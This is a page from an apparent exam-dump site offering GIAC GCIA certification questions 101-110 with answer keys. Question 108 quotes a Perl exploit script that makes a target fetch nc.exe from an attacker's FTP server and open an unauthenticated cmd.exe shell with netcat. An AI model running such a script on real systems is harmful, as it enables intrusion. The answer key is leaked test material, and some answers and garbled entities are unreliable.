[Free] 2017(Sep) EnsurePass Testinsides GIAC GCIA Dumps with VCE and PDF 101-110

Ensurepass.com : Ensure you pass the IT Exams
2017 Sep GIAC Official New Released GCIA
100% Free Download! 100% Pass Guaranteed!
http://www.EnsurePass.com/GCIA.html

Topic 1, Volume A

Question No: 101 – (Topic 1)

You work as a Network Administrator for McRobert Inc. Your company has a TCP/IP-based network. You have configured a WAN link for the network. You are facing connectivity problem across the WAN link. What will be your first step in troubleshooting the issue?

  1. Reinstall TCP/IP protocol.

  2. Check that the correct default gateway is set.

  3. Enable DNS.

  4. Ensure that NetBEUI protocol is loaded.

  5. Use the NETSTAT utility to view TCP/IP statistics.

Answer: B

Question No: 102 – (Topic 1)

You work as a Network Administrator for NetTech Inc. The company has a Windows Server 2008 domain-based network. The network contains four Windows Server 2008 member servers and 120 Windows Vista client computers. You are implementing a caching-only DNS server on one of the member servers. Your assistant wants to know about the caching-only DNS server. Which of the following statements about the caching- only DNS server are correct?

Each correct answer represents a complete solution. Choose three.

  1. It hosts zones and authoritative for a particular domain.

  2. It reduces the amount of DNS traffic on a Wide Area Network (WAN)

  3. It is useful at a site where DNS functionality is needed locally but there is not a requirement for a separate domain for that location.

  4. It performs queries, caches the answers, and returns the results.

Answer: B,C,D

Question No: 103 – (Topic 1)

You work as a Network Administrator for McRobert Inc. You want to know the NetBIOS

name of your computer. Which of the following commands will you use?

  1. NBTSTAT -s

  2. NETSTAT -s

  3. NETSTAT -n

  4. NBTSTAT -n

Answer: D

Question No: 104 – (Topic 1)

Which of the following two cryptography methods are used by NTFS Encrypting File System (EFS) to encrypt the data stored on a disk on a file-by-file basis?

  1. Public key

  2. Digital certificates

  3. Twofish

  4. RSA

Answer: A,B

Question No: 105 – (Topic 1)

You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server 2008 network environment. The network is configured as a Windows Active Directory-based single forest single domain network. Active Directory integrated zone has been configured on the network. You want to create a text file that lists the resource records of a specified zone for your record. Which of the following commands will you use to accomplish the task?

  1. DNSCMD /createdirectorypartition

  2. DNSCMD /copydns

  3. DNSCMD /zoneexport

  4. DNSCMD /config

Answer: C

Question No: 106 – (Topic 1)

Which of the following is included in a memory dump file?

  1. List of loaded drivers

  2. Security ID

  3. Stop message and its parameters

  4. The kernel-mode call stack for the thread that stopped the process from execution

Answer: A,C,D

Question No: 107 – (Topic 1)

Which of the following IPv6 address types is a single address that can be assigned to multiple interfaces?

  1. Unicast

  2. Anycast

  3. Loopback

  4. Multicast

Answer: B

Question No: 108 – (Topic 1)

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = quot;192.168.1.1quot;;# Your FTP Server 89

$user = quot;Anonymousquot;;# login as

$pass = #39;noone@nowhere.com#39;;# password

#################################################################

$host = $ARGV[0]; print quot;Starting …\nquot;;

print quot;Server will download the file nc.exe from $your FTP server.\nquot;; system(quot;perl msadc.pl -h $host -C \quot;echo

open $your gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo $usergt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h

$host -C \quot;echo $passgt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo bingt;gt;sasfile\quot;quot;); system(quot;perl

msadc.pl -h $host -C \quot;echo get nc.exegt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host – C

\quot;echo get hacked.

htmlgt;gt;sasfile\quot;quot;); system(quot;perl msadc.pl -h $host -C \quot;echo quitgt;gt;sasfile\quot;quot;); print quot;Server is downloading …

\nquot;;

system(quot;perl msadc.pl -h $host -C \quot;ftp \-s\:sasfile\quot;quot;); print quot;Press ENTER when download is finished …

(Have a ftp server)\nquot;;

$o=; print quot;Opening …\nquot;;

system(quot;perl msadc.pl -h $host -C \quot;nc -l -p $port -e cmd.exe\quot;quot;); print quot;Done.\nquot;;

#system(quot;telnet $host $portquot;); exit(0);

Which of the following is the expected result of the above exploit?

  1. Creates a share called quot;sasfilequot; on the target system

  2. Opens up a SMTP server that requires no username or password

  3. Creates an FTP server with write permissions enabled

  4. Opens up a telnet listener that requires no username or password

Answer: D

Question No: 109 – (Topic 1)

Which of the following commands will you use to display ARP packets in the snort-output?

  1. snort -v -i eth 0

  2. snort -d -v -i eth 0

  3. snort -dev -i eth 0

  4. snort -deva -i eth 0

Answer: D

Question No: 110 CORRECT TEXT – (Topic 1)

Fill in the blank with the appropriate term.

is the practice of monitoring and potentially restricting the flow of information outbound from one network to another

Answer: Egress filtering

100% Ensurepass Free Download!
Download Free Demo:GCIA Demo PDF
100% Ensurepass Free Guaranteed!
Download 2017 EnsurePass GCIA Dumps

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

2017 EnsurePass IT Certification PDF and VCE

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.